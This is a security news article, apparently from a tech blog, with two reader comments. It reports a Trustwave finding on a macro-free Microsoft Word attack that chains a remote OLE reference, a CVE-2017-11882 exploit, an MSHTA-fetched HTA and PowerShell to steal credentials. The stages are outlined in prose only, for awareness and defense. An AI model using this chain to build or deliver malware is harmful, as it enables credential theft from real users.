New threat vector: Latest Microsoft Word malware doesn’t use macros to unleash attack

A popular method of infecting users with malware has been via Microsoft Office documents that are loaded with malicious macros. Chiefly among these documents are those from Microsoft Word as they are easy to social engineer victims into downloading them. The major reason for hackers utilizing Office documents has to do with the exploitable nature of macros. It is for this reason that macros are disabled by default, but they can be enabled by the choice of the user. But a new Microsoft Word malware attack shows that macros are not necessary to infect a machine. The research coming out of the security company Trustwave details a macro-free malware attack via Word documents in email attachments. The goal of the attack is to steal user credentials in the unsuspecting user’s email, FTP, and browsers via a “multi-stage email Word attack.”

Word malware

The attack is in four parts, which are as follows (with direct quotes from the Trustwave report):

  1. The .docx file (created with Word 2007) is opened and this “allows external access to remote OLE objects to be referenced in the document.xml.rels”
  2. An RTF file download is triggered, which then executes the RTF file that leverages exploit (CVE-2017-11882) that targets MS Equation Editor tool.
  3. The RTF file will “execute an MSHTA command line which downloads and executes a remote HTA file. The HTA file contains VBScript… By decoding each character code in VBScript, it reveals a PowerShell Script which eventually … executes a remote binary file.”
  4. The malicious payload is executed, stealing credentials “by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist.”

The only defense against this particular Word malware is to practice common-sense cybersecurity strategies. Be wary of any email that comes from unknown sources, and most importantly, do not download any document unless you are absolutely certain that it is necessary.

Photo credit: Shutterstock

About The Author

4 thoughts on “New threat vector: Latest Microsoft Word malware doesn’t use macros to unleash attack”

  1. I imagine that Anti-Malware programs will have a very rough time in discovering such malware. One more reason for us to start relying more on our head and less on our security programs.

    1. Derek Kortepeter

      I totally agree which is why I beat the drum of patch update management frequently in my articles. I tend to rant a lot about it. 🙂

Leave a Comment

Your email address will not be published. Required fields are marked *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Scroll to Top